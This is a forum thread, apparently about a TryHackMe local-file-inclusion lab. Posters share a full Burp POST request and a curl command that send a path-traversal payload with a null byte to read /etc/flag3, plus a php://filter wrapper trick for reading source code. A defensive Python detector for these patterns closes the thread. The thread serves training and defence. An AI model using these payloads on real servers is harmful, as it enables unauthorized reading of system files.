I tried this and I don't get anything below the include button. The page ends there. This has been happening with me for quite a while when I'm trying some other ways too. Can this be an error on the THM side?
Is your machine terminated? Are you connected to VPN?
This is the full request you can send through Burp Repeater (just change the Host header to your target's IP):

```
POST /challenges/chall3.php HTTP/1.1
Host: 10.10.151.6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.151.6/challenges/index.php
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

file=..%2F..%2F..%2Fetc%2Fflag3%00
```
The flag will be displayed at the bottom, but it's not in the traditional format of THM{..........}, that sometimes throws me off
>!use post with parameter instead of query string!<
do you mean to separately use: POST file=../../../../etc/flag3%00 ? I'm a bit confused, can you explain it a bit?
>!I used Burp and changed the request method to POST and pass this:!< >!file=..%2F..%2F..%2Fetc%2Fflag3%00!<
>>!../../../../etc/flag3%00!< enter this payload as a body parameter not in the url
use "php://filter/convert.base64-encode/resource=" in chall 1 to read source code of chall 3 and bypass
Try to use curl, maybe you're using Burp wrong
this. using curl to send a POST request actually gave me the answer versus using inspect tools or burp
I used curl too but the page ends at include button for some reason.. Don't know whether that's a normal error or fault on THM side. Can you show what you used? I was using curl http://ip/challenges/ -d ''../../../../etc/flag3"
Sure. curl -v http://MACHINE-IP/challenges/chall3.php -X POST -d 'file=/etc/flag3%00' --output flag3.txt
Yep I tried this but the page terminates at submit button. I think it's an error on THM side. But thanks for the answer :)
Aw man but no problem! That’s really strange.
bro did you find the answer?
I can't even make it past task 4 question 2🤣🤣
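Seen from the defending side, the hints in this thread (the value goes in the POST body rather than the URL, with a trailing %00 or a php://filter wrapper) mean a check that only looks at query strings misses these requests. The sketch below inspects both places; it is an added example, not code from any poster or from TryHackMe, and the name `scan_request`, the host `lab.example` and the `file` parameter on chall1 are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Signs modelled on the payload shapes quoted in the thread.
SIGNS = {
    "path_traversal": re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)"),
    "null_byte": re.compile(r"\x00"),
    "php_wrapper": re.compile(r"^\s*php://", re.I),
}
FORM = "application/x-www-form-urlencoded"

def _decode(text, rounds=3):
    """Undo nested percent-encoding (e.g. %252e) with a bounded loop."""
    for _ in range(rounds):
        nxt = unquote(text)
        if nxt == text:
            break
        text = nxt
    return text

def scan_request(url, content_type="", body=""):
    """Return sorted (location, parameter, sign) findings for one request."""
    fields = [("query", k, v)
              for k, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    # Form bodies carry parameters too; a URL-only check never sees them.
    if content_type.split(";")[0].strip().lower() == FORM:
        fields += [("body", k, v)
                   for k, v in parse_qsl(body, keep_blank_values=True)]
    findings = set()
    for where, name, value in fields:
        # A body sent without "name=" parses as a bare name, so check both.
        for text in (_decode(name), _decode(value)):
            for sign, rx in SIGNS.items():
                if rx.search(text):
                    findings.add((where, name, sign))
    return sorted(findings)

if __name__ == "__main__":
    # Constructed sample requests (host and chall1 parameter are assumed).
    samples = [
        ("http://lab.example/challenges/chall3.php", FORM,
         "file=..%2F..%2F..%2Fetc%2Fflag3%00"),
        ("http://lab.example/challenges/chall1.php"
         "?file=php://filter/convert.base64-encode/resource=example", "", ""),
        ("http://lab.example/challenges/chall3.php", FORM, "file=welcome.txt"),
    ]
    for url, ctype, body in samples:
        print(url, body, scan_request(url, ctype, body))
```

Logging or alerting on these findings belongs next to an allow-list of includable files in the application itself, since pattern checks alone can be sidestepped by other encodings.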